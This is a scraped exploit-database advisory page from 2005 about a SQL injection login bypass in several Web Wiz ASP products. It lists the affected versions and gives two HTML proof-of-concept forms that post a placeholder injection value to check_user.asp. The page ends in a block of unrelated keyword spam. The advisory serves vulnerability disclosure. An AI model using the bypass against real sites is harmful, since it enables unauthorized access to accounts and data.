exploits , vulnerabilities , articles , Web Wiz Multiple Products SQL Injection Vulnerability
| Title |
Web Wiz Multiple Products SQL Injection Vulnerability |
| Published |
2005-12-30-12:00AM |
| Updated |
2005-12-30-04:27PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovered by DevilBox of KAPDA. |
| Vulnerable |
Web Wiz Site News Access 97 3.0 6
Web Wiz Site News Access 2000 3.0 6
Web Wiz Polls Access 97 3.0 6
Web Wiz Polls Access 2000 3.0 6
Web Wiz Journal Access 97 1.0
Web Wiz Journal Access 2000 1.0
Web Wiz Database Login Access 97 1.71
Web Wiz Database Login Access 2000 1.71 |
| Not Vulnerable |
|
| Code |
An exploit is not required.
The following proof of concept example is available: <html> <h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1> <p> Discovery and exploit by devil_box [at} kapda.ir</p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <form method="POST" action="http://www.example.com/[product]/check_user.asp"> <input type="hidden" name="txtUserName" value="[SQL INJECTION]"> <input type="hidden" name="txtUserPass" value="1"> <input type="submit" value="Submit" name="submit"> </form></html>
<html> <h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1> <p> Discovery and exploit by devil_box [at} kapda.ir</p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <form method="POST" action="http://www.example.com/[product]/check_user.asp"> <input type="hidden" name="txtUserName" value="[SQL INJECTION]"> <input type="hidden" name="txtUserPass" value="1"> <input type="submit" value="Submit" name="submit"> </form></html>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Tue, 15 Dec 2009 22:58:11 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
/search/ex www.xdwx.x netid mary Anak bandu t257t hermaphrod WWW.HAIFA. monw3c.blo lo360l asairstarn wwww.98.co www.horses emAlbum conexant freesexyvi for www.ho Seximges www.xxxl.c Shabnur MSN arab ladyb lindsy loh www.sse6.c wwwnangabo Waptricks. keygen sou news+for+C PHP Ini_Re cara de pi donkysex newsfilter ms06040 Sanisex sania mirz Dcash girl Crack+Data p.manohar_ M2u SEXVDOS 200 /compo jd-wiki 8.1 ?name=News Www+sex Applebottu sex700 lo898l oid Waptricks.
|